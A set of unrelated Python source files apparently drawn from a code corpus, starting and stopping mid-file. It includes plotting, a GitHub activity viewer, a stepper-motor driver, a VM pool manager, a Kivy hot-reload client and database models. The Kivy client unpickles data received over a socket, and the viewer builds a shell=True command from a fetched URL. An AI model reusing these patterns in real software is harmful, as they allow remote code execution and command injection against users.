ypoints = ydata[ind]
wpoints = w_array[ind]
fpoints = f_array[ind] ##index returned from click used to select corressponding x,y, frequency data (there could be multiple points selected from click)
first_xpoint = xpoints[0]
first_ypoint = ypoints[0]
first_wpoint = wpoints[0]
first_fpoint = fpoints[0] ##use only the first index returned with each click to annotate the plot, format annotation text
annot.xy = (first_xpoint, first_ypoint)
text = " Z\'={:.4g}\n-Z\"={:.4g}\n \u03c9 ={:.4g}\n f ={:.4g}".format(first_xpoint, first_ypoint, first_wpoint,
first_fpoint)
annot.set_text(text) ## set text for annotation, make annotation visible, and update plot visual
annot.set_visible(True)
fig.canvas.draw()
## print data to console for additional viewing
console_print_text = ' Z\' = {:.4g} Ohms\n-Z\" = {:.4g} Ohms\nAngular Frequency \u03c9 = {:.4g} Hz\nFrequency f = {:.4g} Hz'.format(
first_xpoint, first_ypoint, first_wpoint, first_fpoint)
print('-------------------------------')
print(console_print_text)
print('-------------------------------')
# define a buttonpress event to clear annotation if outside of graph axes
def clear_annot(event):
if event.inaxes is None:
annot.set_visible(False)
event.canvas.draw()
# link defined events to plotting canvas and plot
fig.canvas.mpl_connect('pick_event', onpick)
fig.canvas.mpl_connect('button_press_event', clear_annot)
plt.show()
### Exporting the Data ###
# Convert the numpy data array into a DataFrame and export as a .txt file to the specified location
from tkinter import filedialog
import tkinter.font as font
Z_data = np.column_stack((x, y, w_array, f_array))
df = pd.DataFrame(Z_data, columns=["Z' (ohms)", "-Z'' (ohms)", "Angular frequency (Hz)", "frequency (Hz)"])
#define savefile function for save button. filedialog allows user to set save location and name
def savefile():
global df
file_path = filedialog.asksaveasfilename(defaultextension=".txt", filetypes=[("Text file", ".txt")])
if file_path == "":
return
else:
df.to_csv(file_path)
print("File Saved")
#close window function
def push_close():
save_window.destroy()
# create and format popup save window, assign savefile and close functions to respective buttons
save_window = Tk()
save_window.geometry("500x250")
save_window.title("Save EIS Plot")
frame = LabelFrame(save_window, text="Would you like to save your EIS plot data to a text file?", padx=20, pady=20)
frame.pack()
save_button = Button(frame, text="Save", font=font.Font(size=20), command=savefile)
save_button.pack(padx=10, pady=10)
close_button = Button(frame, text="Close", font=font.Font(size=20), command=push_close)
close_button.pack(padx=10, pady=10)
window_tofront(save_window)
save_window.mainloop()
|
github-activity.py
|
#!/usr/bin/python3
import argparse
import curses
import functools
import json
import os
import subprocess
import sys
import threading
import time
from curses import wrapper
from dataclasses import dataclass
from datetime import datetime
from select import select
from typing import List
from github import Github
DEFAULT_CONFIG_PATH = "~/.config/sextens/config.json"
def timed_cache(seconds: int):
def _wrapper(f):
expired_at = -1
cached_res = None
@functools.wraps(f)
def _wrapped(*args, **kwargs):
nonlocal expired_at
nonlocal cached_res
now = time.time()
if now >= expired_at:
res = f(*args, **kwargs)
cached_res = res
expired_at = now + seconds
else:
res = cached_res
return res
return _wrapped
return _wrapper
@dataclass
class StarEvent:
username: str
repo_name: str
repo_fullname: str
repo_url: str
repo_desc: str
created_at: datetime
# TODO: use async way to feed data to buffer
class StarEventGather:
def __init__(self, client: Github):
self._cli = client
def get_star_list(self, username: str) -> List[StarEvent]:
user = self._cli.get_user(username)
events = user.get_received_events()[:100]
results = []
for event in events:
if (
event.type not in ("WatchEvent")
and event.payload.get("action") != "started"
):
continue
results.append(
StarEvent(
username=event.actor.name or "",
repo_name=event.repo.name.split("/")[-1],
repo_fullname=event.repo.name or "",
repo_desc=event.repo.description or "",
repo_url=event.repo.html_url or "",
created_at=event.created_at,
)
)
return results
@timed_cache(seconds=120)
def list_start_events_by_username(
client: Github, username: str
) -> List[StarEvent]:
gather = StarEventGather(client)
events = gather.get_star_list(username)
return events
class App:
_token: str
_username: str
def __init__(self, config_path: str):
self.ev = threading.Event()
self.config_path = config_path
self.load_config()
def _pregetcher(self):
# because curses.getch doesn't work well with threads
while True:
select([sys.stdin], [], [], 10)
self.ev.set()
def load_config(self):
data = {}
with open(self.config_path, "r") as f:
data = json.loads(f.read())
self._token = data.get("token", "")
self._username = data.get("username", "")
def _init_term_color(self):
# Start colors in curses
curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE)
def run(self, stdscr):
client = Github(self._token)
threading.Thread(target=self._pregetcher, daemon=True).start()
k = 0
cursor_x = 0
cursor_y = 0
stdscr.nodelay(True)
# Clear and refresh the screen for a blank canvas
stdscr.clear()
stdscr.refresh()
self._init_term_color()
history = {}
while k != ord("Q"):
stdscr.clear()
height, width = stdscr.getmaxyx()
if k == ord("j"):
cursor_y = cursor_y + 1
elif k == ord("k"):
cursor_y = cursor_y - 1
cursor_y = min(height - 1, cursor_y, len(history) - 1)
cursor_y = max(0, cursor_y)
# https://stackoverflow.com/questions/11067800/ncurses-key-enter-is-fail
if k == ord("o"):
# open repo url if exists
record = history.get(cursor_y)
if record is not None:
subprocess.run(
f"xdg-open {record.repo_url}",
shell=True,
encoding="utf-8",
)
# whstr = "Width: {}, Height: {}".format(width, height)
records = list_start_events_by_username(client, self._username)
for row, record in enumerate(records):
history[row] = record
created_at = record.created_at.strftime("%Y-%d %H:%M")
s = (
f"{created_at}: {record.username:<16} "
f"starred {record.repo_name:<24}"
)
if len(record.repo_desc) > 40:
s += f" {{{record.repo_desc[:40]}...}}"
elif len(record.repo_desc) > 0:
s += f" {{{record.repo_desc[:40]}}}"
if row == cursor_y:
stdscr.addstr(
row,
0,
s,
curses.color_pair(1) | curses.A_BOLD,
)
else:
stdscr.addstr(row, 0, s, curses.color_pair(1))
stdscr.addstr(
height - 1, 0, "Use j/k to move cursor and o to open link"
)
stdscr.move(cursor_y, cursor_x)
stdscr.refresh()
self.ev.wait()
self.ev.clear()
k = stdscr.getch()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="")
parser.add_argument(
"--config",
action="store",
dest="config_path",
type=str,
help="config path",
default=DEFAULT_CONFIG_PATH,
)
args = parser.parse_args()
config_path = os.path.expanduser(args.config_path)
if not os.path.exists(config_path):
print("Err: your config is not existed, please check config")
wrapper(App(config_path=config_path).run)
|
motor.py
|
# Step Motor driver
# We reference code from "2D plotter"
# Author: Lanyue Fang:(Soft: initialization, axis selection. Hard: physical connection)
# Jingkai Zhang:(Soft: multiprocess. Hard: Cut wires and choose GPIO pins)
# Date: 2021.11
import RPi.GPIO as GPIO
import time
import threading
from init import read_calibration_data
import numpy as np
import math
import datetime
class Motor(object):
def __init__(self):
# initialize the GPIOs for step motor
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
self.y_axis_pins = [4, 5, 6, 17]
self.x_axis_pins = [23, 24, 25, 18]
self.z_axis_pins = [12, 16, 20, 21]
self.unit_step_x = 193
self.unit_step_y = 186
self.unit_step_z= 62
self.unit_pixel = 25
self.cur_coordinate = [5,-1,1] # current coordinate [x,y,z]
self.origin_coordinate = [5,-1,1]
_,self.origin_position_pixel,_ = read_calibration_data() # get the calibration point
self.target_coordinate = [0,0]
self.target_position_pixel = [0,0]
self.transition_coordinate = [0,0]
# set as output GPIOs
for pin in self.y_axis_pins:
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, 0)
for pin in self.x_axis_pins:
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, 0)
for pin in self.z_axis_pins:
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, 0)
self.seq = [[1, 0, 0, 0],
[1, 1, 0, 0],
[0, 1, 0, 0],
[0, 1, 1, 0],
[0, 0, 1, 0],
[0, 0, 1, 1],
[0, 0, 0, 1],
[1, 0, 0, 1], ]
def __del__(self):
GPIO.cleanup()
def get_origin_coordinate(self):
return self.origin_coordinate
def set_cur_coordinate(self, value):
self.cur_coordinate = value
def get_transition_coordinate(self):
self.transition_coordinate = self.target_coordinate.copy()
if self.target_coordinate[0] < 3:
self.transition_coordinate[0] = 3
if self.target_coordinate[1] > 8:
self.transition_coordinate[1] = 8
return self.transition_coordinate
def move(self, axis, blocks):
# print("ori pos",self.origin_coordinate)
# print("cur pos",self.cur_coordinate)
# print('before move ',self.cur_coordinate)
if axis == 'x':
pins = self.x_axis_pins
step = round(abs(blocks) * self.unit_step_x)
self.cur_coordinate[0] = self.cur_coordinate[0] + blocks * -1
elif axis == 'y':
pins = self.y_axis_pins
step = round(abs(blocks) * self.unit_step_y)
self.cur_coordinate[1] = self.cur_coordinate[1] + blocks
else:
pins = self.z_axis_pins
step = round(abs(blocks) * self.unit_step_z)
self.cur_coordinate[2] = self.cur_coordinate[2] + blocks
for i in range(step):
for halfstep in range(8):
for pin in range(4):
if (blocks > 0):
GPIO.output(pins[pin], self.seq[halfstep][pin])
else:
GPIO.output(pins[pin], self.seq[7 - halfstep][pin])
time.sleep(0.0008)
# print('move finished')
# print('after move ',self.cur_coordinate)
def move_xy(self,move_distance,is_multiThread=False): # move_distance = [5,7] 5 is for x axis, 7 is for y axis
if is_multiThread is True:
# thread_x = threading.Thread(target=self.move,args=('x',move_distance[0]))
thread_y = threading.Thread(target=self.move,args=('y',move_distance[1]))
# thread_x.setDaemon(True)
# thread_y.setDaemon(True)
# thread_x.start()
thread_y.start()
# print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')+'two threads begin now')
# thread_x.join()
# thread_y.join()
self.move('x',move_distance[0])
# time.sleep(10)
# print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')+'two threads finished now')
# print('two threads finished now')
else:
self.move('x',move_distance[0])
# time.sleep(1)
self.move('y',move_distance[1])
# time.sleep(1)
def move_by_step(self,axis,step):
step_value = int(abs(step))
if axis == 'x':
pins = self.x_axis_pins
elif axis == 'y':
pins = self.y_axis_pins
for i in range(step_value):
for halfstep in range(8):
for pin in range(4):
if (step > 0):
GPIO.output(pins[pin], self.seq[halfstep][pin])
else:
GPIO.output(pins[pin], self.seq[7 - halfstep][pin])
time.sleep(0.0008)
def move_xy_by_step(self,move_step,is_multiThread=False):
if is_multiThread is True:
thread_y = threading.Thread(target=self.move_by_step,args=('y',move_step[1]))
thread_x = threading.Thread(target=self.move_by_step,args=('x',move_step[0]))
thread_x.start()
thread_y.start()
thread_x.join()
thread_y.join()
else:
self.move_by_step('x',move_step[0])
# time.sleep(1)
self.move_by_step('y',move_step[1])
# time.sleep(1)
def move_by_coordinate(self, x_position, y_position,is_multiThread=False):
dx_block = x_position - self.cur_coordinate[0]
dy_block = y_position - self.cur_coordinate[1]
dx_direction = -1 if dx_block > 0 else 1
dy_direction = 1 if dy_block > 0 else -1
# self.cur_coordinate[0] = x_position
# self.cur_coordinate[1] = y_position
if is_multiThread is False:
# print('x_pos:',x_position,' y_pos:',y_position)
# print('cur_pos:',self.cur_coordinate)
# print('dx_block:',dx_block,' dy_block:',dy_block)
self.move('x', dx_direction * abs(dx_block))
time.sleep(0.5)
self.move('y', dy_direction * abs(dy_block))
time.sleep(0.5)
else:
self.move_xy([dx_direction * abs(dx_block),dy_direction * abs(dx_block)],True)
|
preallocator.py
|
#
# preallocator.py - maintains a pool of active virtual machines
#
from builtins import object
from builtins import range
import threading, logging, time, copy
from tangoObjects import TangoDictionary, TangoQueue, TangoIntValue
from config import Config
#
# Preallocator - This class maintains a pool of active VMs for future
# job requests. The pool is stored in dictionary called
# "machines". This structure keys off the name of the TangoMachine
# (.name). The values of this dictionary are two-element arrays:
# Element 0 is the list of the IDs of the current VMs in this pool.
# Element 1 is a queue of the VMs in this pool that are available to
# be assigned to workers.
#
class Preallocator(object):
def __init__(self, vmms):
self.machines = TangoDictionary("machines")
self.lock = threading.Lock()
self.nextID = TangoIntValue("nextID", 1000)
self.vmms = vmms
self.log = logging.getLogger("Preallocator")
def poolSize(self, vmName):
""" poolSize - returns the size of the vmName pool, for external callers
"""
if vmName not in self.machines.keys():
return 0
else:
return len(self.machines.get(vmName)[0])
def update(self, vm, num):
""" update - Updates the number of machines of a certain type
to be preallocated.
This function is called via the TangoServer HTTP interface.
It will validate the request,update the machine list, and
then spawn child threads to do the creation and destruction
of machines as necessary.
"""
self.lock.acquire()
if vm.name not in self.machines.keys():
self.machines.set(vm.name, [[], TangoQueue(vm.name)])
self.log.debug("Creating empty pool of %s instances" % (vm.name))
self.lock.release()
delta = num - len(self.machines.get(vm.name)[0])
if delta > 0:
# We need more self.machines, spin them up.
self.log.debug(
"update: Creating %d new %s instances" % (delta, vm.name))
threading.Thread(target=self.__create(vm, delta)).start()
elif delta < 0:
# We have too many self.machines, remove them from the pool
self.log.debug(
"update: Destroying %d preallocated %s instances" %
(-delta, vm.name))
for i in range(-1 * delta):
threading.Thread(target=self.__destroy(vm)).start()
# If delta == 0 then we are the perfect number!
def allocVM(self, vmName):
""" allocVM - Allocate a VM from the free list
"""
vm = None
if vmName in self.machines.keys():
self.lock.acquire()
if not self.machines.get(vmName)[1].empty():
vm = self.machines.get(vmName)[1].get_nowait()
self.lock.release()
# REUSE_VMS=False case: new VMs are created right before calling
# allocVM, so no more need to replace it
# if not Config.REUSE_VMS or not vm:
# threading.Thread(target=self.__create(vm, 1)).start()
return vm
def freeVM(self, vm):
""" freeVM - Returns a VM instance to the free list
"""
# Sanity check: Return a VM to the free list only if it is
# still a member of the pool.
not_found = False
self.lock.acquire()
if vm and vm.id in self.machines.get(vm.name)[0]:
machine = self.machines.get(vm.name)
machine[1].put(vm)
self.machines.set(vm.name, machine)
else:
not_found = True
self.lock.release()
# The VM is no longer in the pool.
if not_found:
vmms = self.vmms[vm.vmms]
vmms.safeDestroyVM(vm)
def addVM(self, vm):
""" addVM - add a particular VM instance to the pool
"""
self.lock.acquire()
# REUSEV_VMS=False code path does not call Preallcator::update to
# create machine, so manually handle it here.
if vm.name not in self.machines.keys():
self.machines.set(vm.name, [[], TangoQueue(vm.name)])
self.log.debug("Creating empty pool of %s instances" % (vm.name))
machine = self.machines.get(vm.name)
machine[0].append(vm.id)
self.machines.set(vm.name, machine)
self.lock.release()
def removeVM(self, vm):
""" removeVM - remove a particular VM instance from the pool
"""
if vm.name not in self.machines.keys():
return
self.lock.acquire()
machine = self.machines.get(vm.name)
machine[0].remove(vm.id)
self.machines.set(vm.name, machine)
self.lock.release()
def _getNextID(self):
""" _getNextID - returns next ID to be used for a preallocated
VM. Preallocated VM's have 4-digit ID numbers between 1000
and 9999.
"""
self.lock.acquire()
id = self.nextID.get()
self.nextID.increment()
if self.nextID.get() > 9999:
self.nextID.set(1000)
self.lock.release()
return id
def __create(self, vm, cnt):
""" __create - Creates count VMs and adds them to the pool
This function should always be called in a thread since it
might take a long time to complete.
"""
vmms = self.vmms[vm.vmms]
self.log.debug("__create: Using VMMS %s " % (Config.VMMS_NAME))
for i in range(cnt):
newVM = copy.deepcopy(vm)
newVM.id = self._getNextID()
self.log.debug("__create|calling initializeVM")
vmms.initializeVM(newVM)
self.log.debug("__create|done with initializeVM")
time.sleep(Config.CREATEVM_SECS)
self.addVM(newVM)
self.freeVM(newVM)
self.log.debug("__create: Added vm %s to pool %s " %
(newVM.id, newVM.name))
def __destroy(self, vm):
""" __destroy - Removes a VM from the pool
If the user asks for fewer preallocated VMs, then we will
remove some excess ones. This function should be called in a
thread context. Notice that we can only remove a free vm, so
it's possible we might not be able to satisfy the request if
the free list is empty.
"""
self.lock.acquire()
dieVM = self.machines.get(vm.name)[1].get_nowait()
self.lock.release()
if dieVM:
self.removeVM(dieVM)
vmms = self.vmms[vm.vmms]
vmms.safeDestroyVM(dieVM)
def createVM(self, vm):
""" createVM - Called in non-thread context to create a single
VM and add it to the pool
"""
vmms = self.vmms[vm.vmms]
newVM = copy.deepcopy(vm)
newVM.id = self._getNextID()
self.log.info("createVM|calling initializeVM")
vmms.initializeVM(newVM)
self.log.info("createVM|done with initializeVM")
self.addVM(newVM)
self.freeVM(newVM)
self.log.debug("createVM: Added vm %s to pool %s" %
(newVM.id, newVM.name))
def destroyVM(self, vmName, id):
""" destroyVM - Called by the delVM API function to remove and
destroy a particular VM instance from a pool. We only allow
this function when the system is queiscent (pool size == free
size)
"""
if vmName not in self.machines.keys():
return -1
dieVM = None
self.lock.acquire()
size = self.machines.get(vmName)[1].qsize()
if (size == len(self.machines.get(vmName)[0])):
for i in range(size):
vm = self.machines.get(vmName)[1].get_nowait()
if vm.id != id:
self.machines.get(vmName)[1].put(vm)
else:
dieVM = vm
self.lock.release()
if dieVM:
self.removeVM(dieVM)
vmms = self.vmms[vm.vmms]
vmms.safeDestroyVM(dieVM)
return 0
else:
return -1
def getAllPools(self):
result = {}
for vmName in self.machines.keys():
result[vmName] = self.getPool(vmName)
return result
def getPool(self, vmName):
""" getPool - returns the members of a pool and its free list
"""
result = {}
if vmName not in self.machines.keys():
return result
result["total"] = []
result["free"] = []
free_list = []
self.lock.acquire()
size = self.machines.get(vmName)[1].qsize()
for i in range(size):
vm = self.machines.get(vmName)[1].get_nowait()
free_list.append(vm.id)
machine = self.machines.get(vmName)
machine[1].put(vm)
self.machines.set(vmName, machine)
self.lock.release()
result["total"] = self.machines.get(vmName)[0]
result["free"] = free_list
return result
|
liveappmain.py
|
"""
HotReloader
-----------
Uses kaki module for Hot Reload (limited to some uses cases).
Before using, install kaki by `pip install kaki`
"""
import os
from threading import Thread
import socket
from kaki.app import App as HotReloaderApp # NOQA: E402
from kivy.factory import Factory
from kivy.logger import LOG_LEVELS, Logger # NOQA: E402
from kivy import platform
from kivy.clock import Clock
from kivy.core.window import Window # NOQA: E402
from kivymd.app import MDApp # NOQA: E402
import pickle
# This is needed for supporting Windows 10 with OpenGL < v2.0
from kivymd.toast.kivytoast import toast
if platform == "win":
os.environ["KIVY_GL_BACKEND"] = "angle_sdl2"
Logger.setLevel(LOG_LEVELS["debug"])
class KivyLive(MDApp, HotReloaderApp):
DEBUG = 1 # To enable Hot Reload
# *.kv files to watch
KV_FILES = [f"libs/libkv/{kv_file}" for kv_file in os.listdir("libs/libkv")]
# Class to watch from *.py files
# You need to register the *.py files in libs/uix/baseclass/*.py
CLASSES = {"Root": "libs.libpy.root", "Home": "libs.libpy.home"}
# Auto Reloader Path
AUTORELOADER_PATHS = [
(".", {"recursive": True}),
]
AUTORELOADER_IGNORE_PATTERNS = [
"*.pyc", "*__pycache__*", "*p4a_env_vars.txt*", "*sitecustomize.py*", "*/.kivy*"
]
def __init__(self, **kwargs):
super(KivyLive, self).__init__(**kwargs)
self.current = "home"
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connected = False
self.HEADER_LENGTH = 64
Window.soft_input_mode = "below_target"
self.title = "KivyLiveUi"
self.theme_cls.primary_palette = "Blue"
self.theme_cls.primary_hue = "500"
self.theme_cls.accent_palette = "Amber"
self.theme_cls.accent_hue = "500"
self.theme_cls.theme_style = "Light"
def build_app(self): # build_app works like build method
return Factory.Root()
def on_rebuild(self, *args):
if self.connected:
self.root.children[0].current = self.current
def thread_server_connection(self, ip):
toast(f"establishing connection to {ip}:6051", background=self.theme_cls.primary_color) if ":" not in ip else \
toast(f"establishing connection to {ip.split(':')[0]}: {ip.split(':')[1]}",
background=self.theme_cls.primary_color)
Thread(target=self.connect2server, args=(ip,)).start()
def connect2server(self, ip):
port = 6051
try:
if ":" in ip:
port = ip.split(":")[1]
self.client_socket.connect((ip.split(":")[0], port))
self.connected = True
Clock.schedule_once(
lambda x: toast("Connection Established Successfully", background=self.theme_cls.primary_color))
Logger.info(f"{ip}>6050: Connection Established")
Thread(target=self.listen_4_update).start()
except (OSError, socket.gaierror) as e:
self.connected = False
exception = e
Clock.schedule_once(lambda x: toast(f"{exception}", background=[1, 0, 0, 1]))
except:
pass
def listen_4_update(self):
_header = int(self.client_socket.recv(self.HEADER_LENGTH))
_iter_chunks = _header // 1000
_chunk_remainder = _header % 1000
data = [
self.client_socket.recv(1000)
for _ in range(_iter_chunks)
if _iter_chunks >= 1
]
data.append(self.client_socket.recv(_chunk_remainder))
data = b"".join(data)
load_initial_code = pickle.loads(data)
for i in load_initial_code:
file_path = os.path.split(i)[0]
try:
os.makedirs(file_path)
except (FileExistsError, FileNotFoundError) as e:
Logger.debug(f"{e} : Ignore this")
if os.path.split(i)[1] == "main.py":
continue
with open(
os.path.join(file_path, os.path.split(i)[1]), "wb" if type(load_initial_code[i]) == bytes else "w"
) as f:
f.write(load_initial_code[i])
f.close()
#try:
while True:
header = self.client_socket.recv(self.HEADER_LENGTH)
# if not len(header):
# Clock.schedule_once(
# lambda x: toast("IS SERVER DOWN: Shutting down the connection", background=[1, 0, 0, 1])
# )
# Logger.info("SERVER DOWN: Shutting down the connection")
message_length = int(header)
__chunks = message_length // 1000
__remainder = message_length % 1000
code_data = [
self.client_socket.recv(1000)
for _ in range(__chunks)
if __chunks >= 1
]
code_data.append(self.client_socket.recv(__remainder))
code_data = b"".join(code_data)
self.update_code(pickle.loads(code_data))
# except:
# Clock.schedule_once(lambda x: toast("SERVER DOWN: Shutting down the connection", background=[1, 0, 0, 1]))
# Logger.info("SERVER DOWN: Shutting down the connection")
def update_code(self, code_data):
# write code
file = code_data["data"]["file"]
with open(file, "w") as f:
f.write(code_data["data"]["code"])
Logger.info(f"FILE UPDATE: {file} was updated by {code_data['address']}")
Clock.schedule_once(
lambda x: toast(f"{file} was updated by {code_data['address']}", background=self.theme_cls.primary_color)
)
if __name__ == "__main__":
KivyLive().run()
|
ultrasonic_server.py
|
import threading
import SocketServer
# import cv2
import numpy as np
import math
# distance data measured by ultrasonic sensor
sensor_data = " "
class SensorDataHandler(SocketServer.BaseRequestHandler):
data = " "
def handle(self):
global sensor_data
try:
while self.data:
self.data = self.request.recv(1024)
sensor_data = round(float(self.data), 1)
#print "{} sent:".format(self.client_address[0])
print sensor_data
finally:
print "Connection closed on ultrasonic sonsor thread"
class ThreadServer(object):
def server_thread2(host, port):
server = SocketServer.TCPServer((host, port), SensorDataHandler)
server.serve_forever()
distance_thread = threading.Thread(target=server_thread2, args=('172.24.1.126', 8002))
distance_thread.start()
if __name__ == '__main__':
ThreadServer()
|
models.py
|
from peewee import *
from datetime import datetime
from Utils.IDGenerator import gen_token
from Utils import Salting, JWT, db
from threading import Thread
class BaseModel(Model):
class Meta:
database = db
class User(BaseModel):
uid = TextField(primary_key=True)
date_created = DateTimeField(default=datetime.utcnow)
@classmethod
def register(cls, uid):
"""
register a new user
:param uid: user's global unique id
:return: User instance
"""
obj = cls.create(uid=uid)
obj.save()
return obj
@classmethod
def find_with_uid(cls, uid):
"""
query user using their uid
:param uid: targeted uid
:return: User if found
"""
return (cls
.select()
.where(cls.uid == uid)
.first())
def __str__(self):
return f"<User(uid={self.uid})>"
def __repr__(self):
return self.__str__()
class BelongsToUser:
user = ForeignKeyField(User)
def belongs_to(self, user: User):
"""
check whether this instance
belongs to a user
:param user: user instance
:return: True if belongs to user, else false
"""
return self.user == user
@classmethod
def find_with_user(cls, user: User):
"""
query item using user instance
:param user: user instance
:return: list of BelongsToUser if found
"""
return list(cls.select().where(cls.user == user.uid))
class Session(BaseModel, BelongsToUser):
session_id = TextField(primary_key=True, default=lambda: gen_token(16))
refresh_token = TextField(unique=True, default=lambda: gen_token(32))
date_created = DateTimeField(default=datetime.utcnow)
last_activity = DateTimeField(default=datetime.utcnow)
user = ForeignKeyField(User)
@classmethod
def init(cls, user):
"""
create a new Session
:param user: user's instance
:return: Session
"""
obj = cls.create(user=user)
obj.save()
return obj
def gen_jwt(self, ttl: int = 3600):
"""
generate a new jwt token
:param ttl: time to live in seconds
:return: jwt token, payload
"""
return JWT.gen_jwt(self.session_id, self.user.uid, ttl)
@classmethod
def find_with_session_id(cls, session_id: str):
"""
query session using session id
:param session_id: target session id
:return: Session if found
"""
return (cls
.select()
.where(cls.session_id == session_id)
.first())
@classmethod
def find_with_refresh_token(cls, refresh_token: str):
"""
query session using refresh token
:param refresh_token: target refresh token
:return: Session if found
"""
return (cls
.select()
.where(cls.refresh_token == refresh_token)
.first())
def update_last_activity(self, background=True):
"""
update last activity
:param background: if True will process in background
:return: True on success
"""
self.last_activity = datetime.utcnow()
if background:
Thread(target=self.save).start()
else:
self.save()
return True
def __str__(self):
return f"<Session(session_id={self.session_id}, user={self.user.id})>"
def __repr__(self):
return self.__str__()
class Credentials(BaseModel, BelongsToUser):
user = ForeignKeyField(User, primary_key=True, backref='credentials')
password = BlobField() # of course it is hashed
salt = BlobField()
date_created = DateTimeField(default=datetime.utcnow)
@classmethod
def init(cls, user: User, password: str):
"""
initialize a new Credentials instance for user
:param user: target user
:param password: user's password
:return: Credentials on success
:raises IntegrityError: if credentials already exist
"""
password, salt = cls._create_salt_password(password)
obj = cls.create(user=user, password=password, salt=salt)
obj.save()
return obj
@staticmethod
def _create_salt_password(new_password):
"""
create salt + hashed pass
:param new_password: new password as str
:return: password, salt
"""
salt = Salting.gen_salt()
password = Salting.hash_pswd(new_password, salt)
return password, salt
def change(self, new_password: str):
"""
change the current password to a new one
:param new_password: new password
:return: self
"""
self.password, self.salt = self._create_salt_password(new_password)
return self
def does_match(self, password: str):
"""
check whether a given password matches
:param password: given password
:return: True if matches
"""
return Salting.validate_pswd(
hashed_password=self.password.tobytes(),
salt=self.salt.tobytes(),
password=password)
def __str__(self):
return f"<Credentials(user={self.user.id})>"
def __repr__(self):
return self.__str__()
|
run_samplers.py
|
#!/usr/bin/env python
import os
import copy
import atexit
import argparse
from pprint import pprint
import multiprocessing as mp
from redis import StrictRedis
import torch
from catalyst.dl.scripts.utils import prepare_modules
from catalyst.contrib.registry import Registry
from catalyst.utils.config import parse_args_uargs, save_config
from catalyst.utils.misc import set_global_seeds, boolean_flag
from catalyst.rl.offpolicy.sampler import Sampler
import catalyst.rl.random_process as rp
set_global_seeds(42)
os.environ["OMP_NUM_THREADS"] = "1"
torch.set_num_threads(1)
def build_args(parser):
parser.add_argument("--config", type=str, required=True)
parser.add_argument("--expdir", type=str, default=None)
parser.add_argument("--algorithm", type=str, default=None)
parser.add_argument("--environment", type=str, default=None)
parser.add_argument("--logdir", type=str, default=None)
parser.add_argument("--resume", type=str, default=None)
parser.add_argument(
"--vis",
type=int,
default=None)
parser.add_argument(
"--infer",
type=int,
default=None)
parser.add_argument(
"--train",
type=int,
default=None)
parser.add_argument(
"--action-noise-prob",
type=float,
default=None)
parser.add_argument(
"--param-noise-prob",
type=float,
default=None)
parser.add_argument(
"--max-noise-power",
type=float,
default=None)
parser.add_argument(
"--max-action-noise",
type=float,
default=None)
parser.add_argument(
"--max-param-noise",
type=float,
default=None)
boolean_flag(parser, "debug", default=False)
boolean_flag(parser, "redis", default=True)
return parser
def parse_args():
parser = argparse.ArgumentParser()
build_args(parser)
args, unknown_args = parser.parse_known_args()
return args, unknown_args
def run_sampler(
*,
logdir,
algorithm,
environment,
config, vis, infer,
action_noise_prob,
param_noise_prob,
action_noise=None,
param_noise=None,
id=None,
resume=None,
redis=True
):
config_ = copy.deepcopy(config)
action_noise = action_noise or 0
param_noise = param_noise or 0
if not redis:
redis_server = None
redis_prefix = None
else:
redis_server = StrictRedis(
port=config_.get("redis", {}).get("port", 12000))
redis_prefix = config_.get("redis", {}).get("prefix", "")
id = id or 0
set_global_seeds(42 + id)
if "randomized_start" in config_["env"]:
config_["env"]["randomized_start"] = (
config_["env"]["randomized_start"] and not infer)
env = environment(**config_["env"], visualize=vis)
algo_kwargs = algorithm.prepare_for_sampler(config_)
rp_params = config_.get("random_process", {})
random_process = rp.__dict__[
rp_params.pop("random_process", "RandomProcess")]
rp_params["sigma"] = action_noise
random_process = random_process(**rp_params)
seeds = config_.get("seeds", None) \
if infer \
else config_.get("train_seeds", None)
min_episode_steps = config_["sampler"].pop("min_episode_steps", None)
min_episode_steps = min_episode_steps if not infer else None
min_episode_reward = config_["sampler"].pop("min_episode_reward", None)
min_episode_reward = min_episode_reward if not infer else None
if seeds is not None:
min_episode_steps = None
min_episode_reward = None
pprint(config_["sampler"])
pprint(algo_kwargs)
sampler = Sampler(
**config_["sampler"],
**algo_kwargs,
env=env,
logdir=logdir, id=id,
redis_server=redis_server,
redis_prefix=redis_prefix,
mode="infer" if infer else "train",
random_process=random_process,
action_noise_prob=action_noise_prob,
param_noise_prob=param_noise_prob,
param_noise_d=param_noise,
seeds=seeds,
min_episode_steps=min_episode_steps,
min_episode_reward=min_episode_reward,
resume=resume)
pprint(sampler)
sampler.run()
def main(args, unknown_args):
args, config = parse_args_uargs(args, unknown_args)
os.makedirs(args.logdir, exist_ok=True)
save_config(config=config, logdir=args.logdir)
if args.expdir is not None:
modules = prepare_modules( # noqa: F841
expdir=args.expdir,
dump_dir=args.logdir)
algorithm = Registry.get_fn("algorithm", args.algorithm)
environment = Registry.get_fn("environment", args.environment)
processes = []
sampler_id = 0
def on_exit():
for p in processes:
p.terminate()
atexit.register(on_exit)
params = dict(
logdir=args.logdir,
algorithm=algorithm,
environment=environment,
config=config,
resume=args.resume,
redis=args.redis
)
if args.debug:
params_ = dict(
vis=False,
infer=False,
action_noise=0.5,
param_noise=0.5,
action_noise_prob=args.action_noise_prob,
param_noise_prob=args.param_noise_prob,
id=sampler_id,
)
run_sampler(**params, **params_)
for i in range(args.vis):
params_ = dict(
vis=False,
infer=False,
action_noise_prob=0,
param_noise_prob=0,
id=sampler_id,
)
p = mp.Process(target=run_sampler, kwargs=dict(**params, **params_))
p.start()
processes.append(p)
sampler_id += 1
for i in range(args.infer):
params_ = dict(
vis=False,
infer=True,
action_noise_prob=0,
param_noise_prob=0,
id=sampler_id,
)
p = mp.Process(target=run_sampler, kwargs=dict(**params, **params_))
p.start()
processes.append(p)
sampler_id += 1
for i in range(1, args.train + 1):
action_noise = args.max_action_noise * i / args.train \
if args.max_action_noise is not None \
else None
param_noise = args.max_param_noise * i / args.train \
if args.max_param_noise is not None \
else None
params_ = dict(
